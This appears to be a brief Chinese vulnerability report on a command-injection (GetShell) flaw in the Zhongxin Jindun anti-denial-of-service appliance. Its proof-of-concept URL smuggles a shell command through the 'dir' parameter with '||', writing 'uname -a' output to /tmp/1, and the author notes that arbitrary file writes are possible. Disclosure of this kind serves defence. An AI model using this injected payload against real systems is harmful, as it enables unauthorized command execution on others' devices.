中新金盾抗拒绝服务系统GetShell漏洞2

漏洞作者: Tea

漏洞证明: https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo 命令: uname -a > /tmp/1 写入到/tmp/1文件 可以写任意文件到任意目录,还愁啥? 1223415010234ed3c8ca3cbb4a02cb6fb70f6a03  

发表评论